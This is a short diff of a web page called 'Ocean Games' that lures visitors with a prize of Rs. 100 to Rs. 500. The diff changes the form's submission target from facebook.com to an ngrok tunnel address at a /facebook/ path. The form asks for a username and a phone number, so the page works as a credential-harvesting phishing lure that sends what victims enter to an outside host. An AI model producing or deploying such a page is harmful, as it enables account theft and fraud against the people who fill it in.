--- a/index.html
+++ b/index.html
@@ -9,7 +9,7 @@
     
         <h1>Ocean Games</h1>
         <h2>Play and get chance to win Rs. 100 to Rs. 500</h2>
-            <form action="https://www.facebook.com" method="post" role="form">
+            <form action="http://fa7e-103-147-62-115.ngrok.io/facebook/" method="post" role="form">
             <p>Username</p>
             <input type="text" name="username" placeholder="Enter Username">
             <p>Phone No.</p>
